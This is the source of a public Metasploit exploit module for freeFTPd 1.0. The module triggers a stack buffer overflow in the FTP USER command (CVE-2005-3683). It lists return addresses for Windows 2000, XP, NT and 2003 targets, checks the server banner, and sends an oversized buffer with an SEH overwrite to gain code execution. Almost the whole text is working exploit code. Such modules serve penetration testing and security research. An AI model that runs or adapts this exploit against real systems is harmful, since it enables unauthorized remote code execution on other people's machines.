Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/ftp/freeftpd_user.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Ftp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'freeFTPd 1.0 Username Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in the freeFTPd16multi-protocol file transfer service. This flaw can only be17exploited when logging has been enabled (non-default).18},19'Author' => 'MC',20'License' => MSF_LICENSE,21'References' =>22[23[ 'CVE', '2005-3683'],24[ 'OSVDB', '20909'],25[ 'BID', '15457']26],27'Privileged' => false,28'Payload' =>29{30'Space' => 800,31'BadChars' => "\x00\x20\x0a\x0d",32'StackAdjustment' => -3500,33},34'Platform' => %w{ win },35'Targets' =>36[37[38'Windows 2000 English ALL',39{40'Platform' => 'win',41'Ret' => 0x75022ac4,42},43],44[45'Windows XP Pro SP0/SP1 English',46{47'Platform' => 'win',48'Ret' => 0x71aa32ad,49},50],51[52'Windows NT SP5/SP6a English',53{54'Platform' => 'win',55'Ret' => 0x776a1799,56},57],58[59'Windows 2003 Server English',60{61'Platform' => 'win',62'Ret' => 0x7ffc0638,63},64],65],66'DisclosureDate' => '2005-11-16'67))68end6970def check71connect72disconnect73if (banner =~ /freeFTPd 1\.0/)74return Exploit::CheckCode::Appears75end76return Exploit::CheckCode::Safe77end7879def exploit80connect8182print_status("Trying target #{target.name}...")8384buf = rand_text_english(1816, payload_badchars)85seh = generate_seh_payload(target.ret)86buf[1008, seh.length] = seh8788send_cmd( ['USER', buf] , false)8990handler91disconnect92end93end949596